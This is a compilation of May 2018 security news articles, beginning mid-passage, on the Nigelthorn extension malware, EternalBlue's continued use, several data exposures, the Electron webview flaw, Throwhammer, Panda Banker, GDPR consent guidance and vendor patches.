The actor behind the campaign uses the Bitly URL shortening service when redirecting victims to Facebook to trick users into revealing their login credentials. Based on statistics from Bitly and the Chrome web store, Radware determined that 75% of the infections occurred in the Philippines, Venezuela and Ecuador, with the remaining 25% distributed over 97 other countries.

In order to bypass Google’s validation checks, the malware developers created copies of legitimate extensions and injected a short, obfuscated malicious script into them, to start the malware operation.

“To date, Radware’s research group has observed seven of these malicious extensions, of which it appears four have been identified and blocked by Google’s security algorithms. Nigelify and PwnerLike remain active,” the security researchers note.

When the extension is installed, a malicious JavaScript is executed to download the initial malware configuration from the command and control (C&C) server, after which a set of requests is deployed.

The Nigelthorn malware itself is focused on stealing Facebook login credentials and Instagram cookies. It also redirects users to a Facebook API to generate an access token that is then sent to the C&C.

The stolen credentials are used for propagation, to spread the malicious link to the user’s network either via messages in Facebook Messenger, or via a new post that includes tags for up to 50 contacts. Should any of the victim’s contacts click on the link, the infection process is repeated.

The malware also downloads a cryptomining tool to the victim’s machine. A publicly available browser-mining tool is used for this, downloaded from external sites that the group controls. Over the past several days, the actor was observed attempting to mine Monero, Bytecoin and Electroneum, all of which require CPU power to mine.

Persistence is achieved through closing the extensions tab if the user attempts to access it, and through downloading URI Regex from the C&C and blocking users from accessing Facebook and Chrome cleanup tools or from making edits, deleting posts, and posting comments.

A YouTube plugin is downloaded and executed, after which the malware attempts to access the URI “/php3/youtube.php” on the C&C to receive commands to watch, like, or comment on a video, or to subscribe to the page. These actions are likely an attempt to receive payments from YouTube.

“As this malware spreads, the group will continue to try to identify new ways to utilize the stolen assets. Such groups continuously create new malware and mutations to bypass security controls. Radware recommends individuals and organizations update their current password and only download applications from trusted sources,” the researchers conclude.


Wannacry outbreak anniversary: the EternalBlue exploit even more popular now
13.5.2018 securityaffairs
Ransomware  Exploit

WannaCry ransomware outbreak anniversary – According to researchers from ESET, the popularity of EternalBlue increase significantly over the past months.
Exactly one year ago, on May 12, the WannaCry ransomware infected hundreds of thousands of computers worldwide.

The success of the malware was the use of the EternalBlue exploit that was stolen by Shadow Brokers from the arsenal of the US National Security Agency along with a large cache of tools and exploits.

The group released a 117.9 MB encrypted dump containing documents that suggest NSA hacker SWIFT system in the Middle East.

Some of the codenames for the hacking tools in the dump are OddJob, EasyBee, EternalRomance, FuzzBunch, EducatedScholar, EskimoRoll, EclipsedWing, EsteemAudit, EnglishMansDentist, MofConfig, ErraticGopher, EmphasisMine, EmeraldThread, EternalSynergy, EwokFrenzy, ZippyBeer, ExplodingCan, DoublePulsar.

The tools work against almost all versions of Windows, from Windows 2000 and XP to Windows 7 and 8, and Server 2000, 2003, 2008, 2008 R2 and 2012, except Windows 10 and Windows Server 2016.

In March 2017, a month before EternalBlue was released by Shadow Brokers, Microsoft released the MS17-010 security bulletin containing patches for SMB exploits including EternalBlue.

Just after the leakage online of ETERNALBLUE, security experts started observing a significant increase in the number of malware and hacking tools leveraging the NSA exploit to implement a self-spreading mechanism. Investigations on WannaCry revealed that at least other 3 different groups have been leveraging the NSA EternalBlue exploit.

A few weeks prior to the Wannacry ransomware outbreak, EternalBlue was used by the Adylkuzz botnet for mining activities and by the UIWIX ransomware family.

EternalBlue targets a vulnerability in Windows’ Server Message Block (SMB) on port 445, it only works against older operating system versions, mainly Windows XP and Windows 7.

EternalBlue was later used by other malware, including NotPetya and Bad Rabbit.

According to researchers from ESET, the popularity of EternalBlue increase significantly over the past months.

“And as ESET’s telemetry data shows, its popularity has been growing over the past few months and a recent spike even surpassed the greatest peaks from 2017.” reads the analysis published by ESET.

“EternalBlue had a calmer period immediately after the 2017 WannaCryptor campaign: over the following months, attempts to use the EternalBlue exploit dropped to “only” hundreds of detections daily. Since September last year, however, the use of the exploit has slowly started to gain pace again, continually growing and reaching new heights in mid-April 2018.”

EternalBlue 2017-May2018-2

Experts noticed a significant increase in the use of EternalBlue since September 2017 and reached a peak in mid-April 2018, experts believe that a Satan ransomware campaign observed in April contributed to the rapid spike.

“This exploit and all the attacks it has enabled so far highlight the importance of timely patching as well as the need for a reliable and multi-layered security solution that can block the underlying malicious tool,” continues ESET.

To mitigate the threat, disable SMBv1 and do not expose to the internet SMBv2, unfortunately currently millions of devices with SMBv1 are still exposed online most of them in the UAE, US, Russia, Taiwan, and Japan.

☠️ Nate Warfield 💀
@dk_effect
Almost a year after WannaCry and there's still over a million SMB servers without auth exposed to the world. At least it looks like "only" 66k of them are running Windows 🤦‍♂️🤦‍♂️

4:49 PM - May 11, 2018
23
See ☠️ Nate Warfield 💀's other Tweets


iVideon Russian-based video surveillance solution leaked data, hundreds of thousands of records exposed
13.5.2018 securityaffairs Incindent

Security researchers from Kromtech Security discovered a MongoDB install belonging to the Russian-based video surveillance firm Did iVideon open online.
The database included personal information for over 825,000 subscribers and partners.

Leaked records include logins, email addresses, password hashes, server names, domain names, IP addresses, sub accounts, software settings, and payment settings information (we did not see any credit card data) for both individual subscribers and partners.

iVideon is a multi-platform solution that allows subscribers to aggregate, access, view over the Internet, and record locally or to iVideon’s secure cloud storage, nearly any Internet capable CCTV camera, DVR system, baby monitor, web cam, nanny cam, or even phone, computer, and tablet cameras.

Below the tables included in the MongoDB archive:

servers.info: 12533 records
ivideon.servers: 810871 records
ivideon.partners: 132 records
ivideon.users: 825388 records
The experts reported their discovery to firm that promptly took the archive down.

According to iVideon the server was used for load testing of our auth APIs in Feb 2016, in 2017 the testing policy has been revised, so that such kind of security issues won’t happen again.

The Russian firm added that the archive included password hashes using the Bcrypt algorithm that is considered secure.

“The DB was populated with accounts & devices of several hundreds of Ivideon users marked for participation in beta-testing (Ivideon employees & external early adopters, mostly from Russia), copied multiple times to simulate some growth scenarios.” states the reply from iVideon shared by Kromtech Security.

“User info only included email, IP address and password hashes produced by a strong Bcrypt algorithm. No information related to payments, usage stats or means of getting access to user’s private data was present in the compromised DB. Partner data seen in the DB was real, containing only partner companies’ names and UI settings for their apps.”

The company was also the victim of an attack, hackers tried to blackmail it, unfortunately, attackers have left no info in the logs. Crooks demanded a .2 bitcoin ransom, the wallet they used received two payments probably made by other victims of the gang.

iVideon believes that exposed data do not pose a threat to its users or partners and downplayed the incident.

Kromtech Security applauded the company for its rapid response to the incident.

“We also definitely agree that one should not pay ransom in cases such as this, we’ve seen that it’s nothing but a scam. Their ability to quickly ascertain that only some of the deleted data was real and that aggregate traffic statistics on a router prove to them that it was not stolen will come as a relief to those who had real data in that database.” concluded Kromtech Security.

“Those users should also be pleased to know that they solved this issue in 2017 so that the data we found this year won’t be found again.”

Kromtech experts confirmed that data included in the archive appeared to be legitimate.

The researchers noticed that after they discovered and reported it to iVideon, and prior to the company taking it down, this database was compromised in the same fashion.

iVideon data leak


UK mobile operator EE left a critical code system exposed with a default password
13.5.2018 securityaffairs
Vulnerebility

The EE operator, the British largest cell network in the UK with some 30 million customers, has left a critical code system exposed online with a default password.
EE, a British mobile network giant owned by BT Group has been accused of leaving a critical code repository on an open-source tool protected by a default username and password.

The British mobile network giant EE has reportedly left a critical code repository on an open-source tool protected by default credentials.

The disconcerting discovery was made by a security researcher that uses the Twitter handle of “six,” he found two million lines of code including access to the company’s private employee and developer APIs and Amazon Web Services secret keys.

“One of the largest mobile networks in Britain, EE, which is also owned by BT Group, was accused of risking the safety of a critical code repository due to bad security. Apparently, the company left the repository protected only by a default login info, according to one researcher.” reported the koddos.net website.

six
@lol_its_six
After waiting many many weeks for no reply, I have decided to let the public know, since @EE clearly do not care about security. EE has exposed over 2 million lines of private source code to their systems and employee systems, due to using an admin:admin user/pass combination - 1

6:02 PM - May 10, 2018
29
18 people are talking about this
Twitter Ads info and privacy

six
@lol_its_six
10 May
After waiting many many weeks for no reply, I have decided to let the public know, since @EE clearly do not care about security. EE has exposed over 2 million lines of private source code to their systems and employee systems, due to using an admin:admin user/pass combination - 1

six
@lol_its_six
Access to this allows malicious hackers to analyze source code and identify vulnerabilities within. Actually; there's no need, since you can just view the code and take AWS keys, API keys, and more. Also; pushing to prod with 167 vulnerabilities???? (MyEE-Web master) - 2 pic.twitter.com/jyLEBt2f0w

6:03 PM - May 10, 2018

13
See six's other Tweets
Twitter Ads info and privacy
The availability of the keys could be exploited by attackers to analyze the code of the employee’s payment systems and discover vulnerabilities to exploit for malicious purposes.

According to the researcher, payment information, including credit card data, is at risk.

six
@lol_its_six
10 May
Replying to @lol_its_six
Access to this allows malicious hackers to analyze source code and identify vulnerabilities within. Actually; there's no need, since you can just view the code and take AWS keys, API keys, and more. Also; pushing to prod with 167 vulnerabilities???? (MyEE-Web master) - 2 pic.twitter.com/jyLEBt2f0w

six
@lol_its_six
You trust these guys with your credit card details, while they do not care about security, or customer privacy. Picture below shows access keys to authorize to their employee tool, for customer lookups. pic.twitter.com/clG4wsFcAM

6:05 PM - May 10, 2018

5
See six's other Tweets
Twitter Ads info and privacy
The code was exposed on the SonarQube open source platform hosted on an EE subdomain that was used by the mobile network company to analyze code with the intent to bugs and security vulnerabilities on their website.

According to the researchers, he notified the data leak EE several times for weeks, but the company did not reply.

“After waiting many many weeks for no reply, I have decided to let the public know, since @EE clearly do not care about security. EE has exposed over two million lines of private source code to their systems and employee systems, due to using an ‘admin:admin’ user/pass combination,” six tweeted.

uk EE operator

A spokesman for the company contacted ZDNet criticized the research and his claims and tried to downplay the incident sustaining that none of the customer or payment data at risk.

According to the spokesperson later it is a development code that does not contain any information related to the production infrastructure

Anyway, the company had changed the password and that the service was taken offline.

“Our final code then goes through further checks, processes, and review from our security team before being published,” the spokesperson said. “This development code does not contain any information pertaining to our production infrastructure or production API credentials as these are maintained in separate secure systems and details are changed by a separate team.”

“We take the security of our customer data extremely seriously and would like to thank the researcher for bringing this issue to our attention. We’re conducting a thorough investigation to make sure this does not happen again,” the spokesperson told ZDNet.


Malicious package containing Bytecoin cryptocurrency miner found on the Ubuntu Snap Store
13.5.2018 securityaffairs
Virus  Cryptocurrency

An Ubuntu user has spotted a Bytecoin cryptocurrency miner hidden in the source code of an Ubuntu Snap Pack in the Official Ubuntu Snap Store.
An Ubuntu user that goes online with the GitHub moniker “Tarwirdur” has discovered a malware in the source code of an Ubuntu snap package hosted on the official Ubuntu Snap Store, a first analysis revealed that it is a cryptocurrency miner.

The malicious code was able to mine the Bytecoin (BCN) cryptocurrency, the account hardcoded in the malware is “myfirstferrari@protonmail.com.”

The malicious app is 2048buntu, it is a copycat of the legitimate of the 2024 game included as an Ubuntu snap.

2048buntu-game ubuntu snap store

Tarwirdur discovered the app contained a cryptocurrency mining application disguised as the “systemd” daemon, the package also includes an init script that allows gaining boot persistence on the target.

Tarwirdur reported his discovery to the maintainers at the Ubuntu Snap Store team that promptly removed the app. The user also noticed another app uploaded by the same developers and after a check, he discovered it also contained a malicious code and for this reason, it was removed too.

“At least two of the snap packages, 2048buntu and Hextris, uploaded to the Ubuntu Snaps Store by user Nicolas Tomb, contained malware. All packages by Nicolas have since been removed from the Ubuntu Snaps Store, “pending further investigations“.” states a post published on the website linuxuprising.com.

Currently, it is impossible to establish the number of affected users because the Ubuntu Snap Store does not provide an install count.

The problem is that submitted snaps do not go through a security check, this means that ill-intentioned can upload malicious snap packages to the Ubuntu Snap Store.


A new flaw in Electron poses a risk to apps based on the framework
13.5.2018 securityaffairs
Vulnerebility

Security experts have discovered a vulnerability in the Electron software framework that has been used for building a large number of popular desktop applications.
Popular desktop applications, including Skype, Slack, GitHub Desktop, Twitch, WordPress.com, and others, are potentially affected.

Electron is a node.js, V8, and Chromium open-source framework that allows developers to use web technologies such as JavaScript, HTML, and CSS to build desktop apps.

When building apps based on the Electron framework, developers can choose Electron API or the Node.js APIs and its modules.

Node.js APIs and built-in modules provide developers a wider integration with the OS and allow to access to more OS features.

In order to prevent the abuse of OS features, Electron team created a mechanism that prevents attacks on apps based on their framework.

“Electron applications are essentially web apps, which means they’re susceptible to cross-site scripting attacks through failure to correctly sanitize user-supplied input. A default Electron application includes access to not only its own APIs, but also includes access to all of Node.js’ built in modules.” reads the analysis published by Trustwave. “This makes XSS particularly dangerous, as an attacker’s payload can allow do some nasty things such as require in the child_process module and execute system commands on the client-side.”

Apps that run HTML and JS code on the desktop have the “nodeIntegration: false” option enabled by default, this implies that the access to the Node.js APIs and modules is disabled by default.

The WebView tag feature allows developers to embed content, such as web pages, into an Electron application and run it as a separate process.

“When using a WebView tag you are also able to pass in a number of attributes, including nodeIntegration. WebView containers do not have nodeIntegration enabled by default.” continues the analysis.

When webviewTag is set to false in a webPreferences config file the nodeIngration is also set to false, however, if developers don’t declare webviewTag, then the Electron app considers nodeIntegration set to false.

Trustwave researcher Brendan Scarvell discovered that is possible to turn the nodeIntegration option to “true” and allows a malicious application to access Node.js APIs and modules and abuse more OS features.

Scarvell explained that if the developers of an Electron-based app have not specifically set the “webviewTag: false” option inside webPreferences config file, an attacker can exploit a cross-site scripting (XSS) vulnerability inside an app to create a new WebView component window to change the settings and to set the nodeIngrationflag to “true.”

electron

The expert published proof-of-concept code that could be used by an attacker to exploit any XSS flaw and gain access to the underlying OS.

“If you find an Electron application with the nodeIntegration option disabled and it contains either an XSS vulnerability through poor sanitization of user input or a vulnerability in another dependency of the application, the above proof-of-concept can allow for remote code execution provided that the application is using a vulnerable version of Electron (version < 1.7.13, < 1.8.4, or < 2.0.0-beta.3), and hasn’t manually opted into one of the following:

Declared
webviewTag: false
in its webPreferences.
Enabled the nativeWindowOption option in its webPreferences.
Intercepting new-window events and overriding event.newGuest without using the supplied options tag.” continues the analysis.
Scarvell reported the vulnerability to Electron team that addressed it in March.


One Year After WannaCry Outbreak, EternalBlue Exploit Still a Threat
12.5.2018 securityweek
Exploit

One year after the WannaCry ransomware outbreak, the NSA-linked exploit used for propagation is still threatening unpatched and unprotected systems, security researchers say.

The WannaCry infection started on May 12, 2017, disrupting Spanish businesses and dozens of hospitals in the U.K. The malware hit Windows 7 the most and was estimated to have infected nearly half a million computers and other types of devices within 10 days.

The largest number of machines was hit in the first hours of the outbreak, before a security researcher discovered a kill-switch and slowed the spreading to a near stop.

“WannaCry served as a cybersecurity wake-up call for many organizations that were falling behind in their routine IT responsibilities,” Ken Spinner, VP of Field Engineering, Varonis, told SecurityWeek in an emailed comment.

“While WannaCry tore through organizations like the NHS, companies that kept their systems updated with the latest patches, performed backups and took proactive security measures emerged unscathed,” Spinner continued.

WannaCry was able to spread fast because it abused an exploit supposedly stolen from the National Security Agency-linked Equation Group. Called EternalBlue, the exploit was made public in April 2017, one month after Microsoft released a patch for it.

EternalBlue is targeting a vulnerability in Windows’ Server Message Block (SMB) on port 445, but only older operating system versions (mainly Windows XP and Windows 7) are impacted.

Although it brought the exploit to the spotlight, WannaCry wasn’t the first malware to abuse it. During the weeks prior to the outbreak, EternalBlue was leveraged by a crypto-currency mining botnet and a backdoor. A ransomware family called UIWIX was also observed abusing it around the same period.

Despite Microsoft releasing a couple of patches for the security flaw targeted by EternalBlue, including an emergency patch for unsupported systems, tens of thousands of systems continued to be vulnerable last summer.

WannaCry, which was supposedly the work of North Korean actors, managed to wreak havoc a year ago, but it died fast. EternalBlue, on the other hand, remained strong, and was also abused in the global NotPetya attack last year.

In fact, security researchers say that the NSA-linked exploit is currently more popular among cybercriminals than it was a year ago.

Overall, more than 2 million users were observed being hit via the exploit from May 2017 to May 2018, Moscow-based security firm Kaspersky Lab told SecurityWeek.

The number of unique users hit by EternalBlue was 10 times higher in April 2018 compared to May 2017, with an average of more than 240,000 users being attacked via this exploit every month, the security firm also said.

“The fact that hackers keep targeting users using the EternalBlue exploit in their attacks means that many systems remain unpatched, which could lead to some dangerous consequences. It’s still highly important for organizations to take a close look at the security of their networks. Their first priority should be to install all necessary patches on time, in order to avoid losses in the future,” said Anton Ivanov, lead malware analyst, Kaspersky Lab.

According to ESET, not only did the popularity of EternalBlue increase significantly over the past months, but a “recent spike even surpassed the greatest peaks from 2017.”

Following a calmer period after the WannaCry attack, when only hundreds of detections were observed daily, the use of EternalBlue started picking up pace in September last year and reached new heights in mid-April 2018.

A Satan ransomware campaign observed last month likely contributed to the latest spike, but the exploit might have been used in other malicious activities as well, the researchers say.

“This exploit and all the attacks it has enabled so far highlight the importance of timely patching as well as the need for a reliable and multi-layered security solution that can block the underlying malicious tool,” ESET points out.

The main reason EternalBlue’s usage is spiking is the existence of millions of vulnerable devices that continue to be exposed to the Internet, as Mounir Hahad, head of Juniper Threat Labs at Juniper Networks, told SecurityWeek.

“Immediately after the WannaCry epidemic last year, most security researchers advised people to disable SMBv1 entirely and make sure SMBv2 was not exposed to the internet. One year later and we are still seeing about 2.3M devices with SMBv1 exposed to the internet, with the majority of these vulnerable machines in the UAE, US, Russia, Taiwan and Japan,” Hahad said.

"The same mitigation techniques that have been recommended over and over again are still relevant and effective to minimize the impacts of a ransomware attack, but it comes down to actually implementing them,” Hahad continued.


Throwhammer, the new Rowhammer attack to remotely hack systems over the LAN
12.5.2018 securityaffairs
Attack

Security experts devised a new attack technique dubbed Throwhammer that could be exploited by attackers to launch Rowhammer attack on a system in a LAN.
A few days ago we discussed the GLitch attack that leverages graphics processing units (GPUs) to launch a remote Rowhammer attack against Android smartphones.

Now security experts devised a new attack technique dubbed Throwhammer that could be exploited by attackers to launch Rowhammer attack on a system just by sending specially crafted packets to the vulnerable network cards over the local area network.

Rowhammer is classified as a problem affecting some recent DRAM devices in which repeatedly accessing a row of memory can cause bit flips in adjacent rows, this means that theoretically, an attacker can change any value of the bit in the memory.

The issue has been known at least since 2012, the first attack was demonstrated in 2015 by white hat hackers at Google Project Zero team.

In October 2016, a team of researchers in the VUSec Lab at Vrije Universiteit Amsterdam devised a new method of attack based on Rowhammer, dubbed DRAMMER attack, that could be exploited to gain ‘root’ access to millions of Android smartphones and take control of affected devices.

The new technique was devised by the same team of researchers that proposed the previous ones, a group of experts from the Vrije Universiteit Amsterdam and the University of Cyprus.

This time the researchers demonstrated that sending malicious packets over LAN it is possible to implement a Rowhammer attack on systems running Ethernet network cards equipped with Remote Direct Memory Access (RDMA). Such kind of configuration is widely adopted in cloud infrastructure and data centers.

throwhammer

The RDMA feature is used by network cards to allow computers in a network to exchange data (with read and write privileges) directly to the main memory. The researchers demonstrated that it is possible to abuse this feature to perform access to the target memory in rapid succession triggering bit flips on DRAM.

Researchers explained that the Throwhammer attack requires a high-speed network of at least 10Gbps to trigger a bit flip through hundreds of thousands of memory accesses to specific DRAM locations within tens of milliseconds.

“Specifically, we managed to flip bits remotely using a commodity 10 Gbps network. We rely on the commonly-deployed RDMA technology in clouds and data centers for reading from remote DMA buffers quickly to cause Rowhammer corruptions outside these untrusted buffers.” reads the research paper published by the experts.

“These corruptions allow us to compromise a remote memcached server without relying on any software bug”

According to the paper, the experts were able to observe bit flips accessing memory 560,000 times in 64 ms (roughly 9 million accesses per second) over LAN to its RDMA-enabled network card.

“Even regular 10 Gbps Ethernet cards can easily send 9 million packets per second to a remote host that end up being stored on the host’s memory.” continues the paper.

“Might this be enough for an attacker to effect a Rowhammer attack from across the network? In the remainder of this paper, we demonstrate that this is the case and attackers can use these bit flips induced by network traffic to compromise a remote server application.”

Let me remind you that the Rowhammer technique exploits a computer hardware weakness, this means that it is not possible to use software patch to mitigate it.

Experts explained that disable RDMA to mitigate the attack is effective but nor not realistic, therefore, they presented some solutions such as ALIS, a custom allocator that isolates a vulnerable RDMA buffer.

Technical details for the Throwhammer attack are available in the paper published by the experts and titled “Throwhammer: Rowhammer Attacks over the Network and Defenses.”


Chrome 66 Update Patches Critical Security Flaw
11.5.2018 securityweek
Vulnerebility

An updated version of Chrome 66 is now available, which addresses a Critical security vulnerability that could allow an attacker to take over a system.

A total of 4 security vulnerabilities were addressed in the latest browser release, three of which were reported by external researchers.

The most important of the vulnerabilities are two High severity flaws that chain together to result in a sandbox escape. The issues include CVE-2018-6121, a privilege escalation in extensions, and CVE-2018-6122, a type confusion in V8.

The vulnerability chain was reported by an anonymous researcher on April 23. Google hasn’t published information on the flaw, but it appears that a remote attacker could exploit it to take control of vulnerable systems.

Another vulnerability resolved in the new browser iteration is CVE-2018-6120, a heap buffer overflow in PDFium reported by Zhou Aiting of Qihoo 360 Vulcan Team. The security researcher received a $5,000 reward for the finding.

The updated browser is available for download as version 66.0.3359.170 for Windows, Mac, and Linux devices.

This is the second time Google patches a Critical bug in Chrome 66 since the browser’s release in the stable channel less than a month ago.

In late April, the Internet giant addressed a use-after-free in Media Cache that could be exploited by a malicious actor to cause denial of service and possibly execute arbitrary code. The bug was reported by security researcher Ned Williamson, who received a $10,500 reward for the discovery.

The first stable release of Chrome 66 arrived with fixes for 62 security vulnerabilities, including two use after free in Disk Cache rated Critical severity (CVE-2018-6085 and CVE-2018-6086). Both issues were reported by Ned Williamson.


Panda Banker Campaign Hits U.S. Banks
11.5.2018 securityweek
Virus

Recently detected campaigns using the Panda Banker malware are targeting financial institutions worldwide, with those in the United States taking the largest hit, F5 reports.

First seen in 2016, Panda is based on the leaked source code of the infamous Zeus banking Trojan and has been involved in multiple infection campaigns globally. Sold as a kit on underground forums, the malware uses man-in-the-browser and webinjects to steal user credentials.

Historically, the threat has been targeting financial institutions in Italy, Canada, Australia, Germany, the United States, and the United Kingdom, but also started focusing on Japan earlier this year.

Now, F5 reports that, while Japan continues to be hit, the malware is also targeting users in the United States, Canada, and Latin America.

In February, the malware was targeting financial services and cryptocurrency sites in Italy with screenshots rather than webinjects, likely “to document and spy on user interaction at cryptocurrency accounts.”

In May, three different Panda Banker campaigns were observed, each focused on another geography.

One of them, F5 reports, hit 8 industries in North America, with 78% of the targets being US financial organizations. Canadian financial organizations, cryptocurrency sites, global social media providers, search and email providers, payroll, entertainment, and tech providers were also targeted.

“This campaign is also targeting major social media platforms like Facebook and Instagram, as well as messaging apps like Skype, and entertainment platforms like Youtube. Additionally, Panda is targeting Microsoft.com, bing.com, and msn.com,” F5 reports.

The same Panda botnet, marked as 2.6.8, is targeting Japanese financials as well. For that, however, the malware authors removed the Content Security Policy (CSP) headers, a security standard for preventing cross-site scripting (XSS), clickjacking and other injection attacks that could lead to the execution of malicious code from an otherwise trusted site.

This campaign also targets Amazon, YouTube, Microsoft.com, Live.com, Yahoo.com, and Google.com (likely targeting email accounts), along with Facebook and Twitter, and a couple of adult sites.

A third parallel campaign is hitting Latin America, focused on banks in Argentina, Columbia, and Ecuador, and the same social media, search, email, entertainment, and tech provider as the other attacks.

“This act of simultaneous campaigns targeting several regions around the world and industries indicates these are highly active threat actors, and we expect their efforts to continue with multiple new campaigns coming out as their current efforts are discovered and taken down,” F5 concludes.


UK Regulator Issues Advice on 'Consent' Within GDPR
11.5.2018 securityweek Privacy

The UK's Information Commissioners Office (ICO -- the data protection regulator) has published detailed guidance (PDF) on 'consent' within the General Data Protection Regulation. Since the UK is still in the European Union, the document provides a reasonable analysis of what is one of the trickiest aspects of GDPR. Once the UK leaves the EU, GDPR within the UK will be replaced by the new Data Protection Bill, which is designed to ensure the UK's data protection adequacy. It is not guaranteed to succeed in this.

Consent is not the only legal basis for processing personal data under GDPR. Others are a contractual relationship; compliance with a separate legal obligation; a public task; vital interest (as in, to save a life); and legitimate interests. Some of these are nuanced and may require detailed legal advice before being relied upon -- 'legitimate interests' does not mean that any commercial enterprise can ignore consent in the pursuit of profit.

GDPR in United Kingdom after BrexitNevertheless, user consent is likely to be the primary legal justification for processing user data. Under GDPR, it is not very different to the existing requirement for consent under the European Data Protection Directive (DPD), but adds a few significant aspects. In particular, it requires that consent must be 'unambiguous' and involve 'a clear affirmative action'.

The GDPR expansion of consent comes not in the definition but in the use and implications of consent. Three key areas are the need for keeping records of consent; the user's right to withdraw consent; and the inability to make consent a condition of a contract. "In essence," says the ICO, "there is a greater emphasis in the GDPR on individuals having clear distinct ('granular') choices upfront and ongoing control over their consent."

Genuine and lawful consent becomes a double-edged sword. On the one hand, it gives the user greater control over the use of his or her data (for example, the 'right to be forgotten' and the right to data portability); while on the other hand, the ICO says that explicit consent "can legitimize automated decision-making, including profiling."

However, it is the way the additional consent requirements play upon the definition of consent that can introduce confusion. An obvious example -- which has always existed but is now brought into focus by the potential size of the new GDPR fines -- involves 'freely given'. Consent cannot be freely given if there is imbalance in the relationship between the individual and the controller. "This will make consent particularly difficult for public authorities and for employers, who should look for an alternative lawful basis where possible," warns the ICO.

In general, public authorities should rely on the 'public task' justification rather than the consent justification. Employers who wish to process information on staff must be wary of any implication that continued employment might depend upon their consent to the processing -- that consent cannot be freely given and any reliance by the employer on that consent would be illegal.

The right to be forgotten is another complication. The implication of the regulation is that if, for any reason, the user cannot withdraw consent, or the data cannot be deleted, then consent was never legally given. Under such circumstances, user consent is most likely the wrong justification. The ICO uses a credit card company as an example. The company might ask for the user's consent to send details to a credit reference agency.

"However," says the ICO, "if a customer refuses or withdraws their consent, the credit card company will still send the data to the credit reference agencies on the basis of 'legitimate interests'. So, asking for consent is misleading and inappropriate -- there is no real choice." In this instance, the 'legitimate interests' justification should have been used from the outset -- not user consent.

The inability to use consent as a contract condition is another nuanced area that could lead to confusion. "If you require someone to agree to processing as a condition of service," says the ICO, "consent is unlikely to be the most appropriate lawful basis for the processing. In some circumstances it won't even count as valid consent."

The example given concerns a cafe that decides to offer its customers free wifi if they provide their name, email address and mobile phone number and then agree to the cafe's terms and conditions. The T&Cs make it clear that the details will be used for direct marketing. "The cafe is therefore making consent to send direct marketing a condition of accessing the service. However, collecting their customer's details for direct marketing purposes is not necessary for the provision of the wifi. This is not therefore valid consent."

If the consent issue sounds complex and confusing, it is because it is complex and confusing. For example, probably every reader will have received emails from companies seeking to gain 're-consent' to continue sending marketing or other emails before GDPR comes into effect. One example received here simply says, "To comply with the new EU General Data Protection Regulation (GDPR), we need to confirm that you want to keep receiving our marketing emails. Please confirm your subscription to [our firm's] marketing communications by clicking the button below." (Incidentally, beware of similar but false phishing emails.)

The reality is that such emails are either unnecessary or illegal. If the original consent was properly acquired in the first case, it will almost certainly remain valid. If consent was either not or inappropriately gathered in the first place, then this email is inadequate for GDPR's requirements. At just one very simple and basic level, it doesn't inform the reader of the right to withdraw consent; and is consequently not valid consent.

A case in point is the £13,000 fine levied by the ICO on Honda Motor Europe Ltd. The ICO announced in March 2017, "A separate ICO investigation into Honda Motor Europe Ltd revealed the car company had sent 289,790 emails aiming to clarify certain customers' choices for receiving marketing."

Honda believed it was doing so to abide by GDPR -- but in fact it was breaching the consent requirements of a separate law (the Privacy and Electronic Communication Regulations -- PECR), "The firm believed the emails were not classed as marketing but instead were customer service emails to help the company comply with data protection law. Honda couldn't provide evidence that the customers had ever given consent to receive this type of email, which is a breach of PECR. The ICO fined it £13,000."

At around the same time, the ICO fined the British Flybe airline £70,000 for sending more than 3.3 million emails to people who had told them they didn't want to receive marketing emails from the firm. Steve Eckersley, ICO Head of Enforcement, said at the time, "Both companies sent emails asking for consent to future marketing. In doing so they broke the law. Sending emails to determine whether people want to receive marketing without the right consent, is still marketing and it is against the law."

These fines, had they been levied under GDPR after 25 May 2018, could have been considerably higher.

The document published by the ICO is long and complex, but full of links for further information and examples of valid and invalid use of user consent. Getting consent wrong could be costly -- but getting it right is beneficial. "The GDPR sets a high standard for consent. Consent means offering people genuine choice and control over how you use their data," says the ICO. "When consent is used properly, it helps you build trust and enhance your reputation."


Rockwell Automation Patches Flaws in Simulation, Licensing Tools
11.5.2018 securityweek
Vulnerebility

Rockwell Automation has released updates for its Arena and FactoryTalk Activation Manager products to address various types of vulnerabilities, including a critical flaw that can allow remote code execution.

Both ICS-CERT and Rockwell Automation have released advisories describing the security holes and mitigations, but the vendor's advisories are only available to registered users.

FactoryTalk Activation Manager, a tool designed for managing licensed content and activating Rockwell software products, uses the Wibu-Systems CodeMeter and FlexNet Publisher license management applications.

Wibu-Systems CodeMeter is affected by a cross-site scripting (XSS) vulnerability that can be exploited to inject arbitrary code via a field in a configuration file, allowing attackers to access sensitive information or alter the impacted HTML page. The issue is tracked as CVE-2017-13754 and is considered low severity.

FlexNet Publisher, on the other hand, is affected by a critical buffer overflow (CVE-2015-8277) that can allow a remote attacker to execute arbitrary code.

"A custom string copying function of Imgrd.exe (the license server manager in FlexNet Publisher) and flexsvr.exe does not use proper bounds checking on incoming data, potentially allowing a remote, unauthenticated user to send crafted messages with the intent of causing a buffer overflow," Rockwell said in its advisory.

The vulnerabilities impact FactoryTalk Activation Manager 4.00.02 and 4.01, which include Wibu-Systems CodeMeter v6.50b and earlier, and FactoryTalk Activation Manager v4.00.02 and earlier, which include FlexNet Publisher v11.11.1.1 and earlier.

FactoryTalk Automation Manager is used by more than two dozen Rockwell products – users can consult a list provided by the vendor and ICS-CERT to see if they are affected. Updating Automation Manager to version 4.02 patches the vulnerabilities. Alternatively, CodeMeter can be updated to a compatible version.

Separate advisories published recently by Rockwell and ICS-CERT describe a medium severity denial-of-service (DoS) vulnerability affecting Arena, a simulation software for the manufacturing sector. Arena is designed to help organizations identify process bottlenecks, evaluate process changes, improve logistics, and increase throughput.

Researcher Ariele Caltabiano informed Rockwell through Trend Micro’s Zero Day Initiative (ZDI) that Arena is affected by a use-after-free vulnerability that can be exploited to crash the software by convincing the targeted user to open a specially crafted file. Crashing the application could lead to the user losing unsaved data.

Rockwell says the flaw, tracked as CVE-2018-8843, affects Arena Simulation Software for Manufacturing versions 15.10.00 and earlier, and it has been patched with the release of version 15.10.01.


Mining passwords from dozens of public Trello boards
11.5.2018 securityaffairs Hacking

Trello, when an error in the publishing strategy is able to put at risk the private data of a huge community of unaware users.
A “Security enthusiastic” found a vulnerability in the Trello web management and now with a simple dork is possible to query to mine passwords from dozens of public Trello boards.

trello 2

Our story begins form @Trello Twitter account where we read:

“Trusted by millions, Trello is the visual collaboration tool that creates a shared perspective on any project.” Yes, “trusted by millions”: but those millions probably didn’t understand the meaning “Public” of the Trello Boards, which they used as “Private” space while they are not.

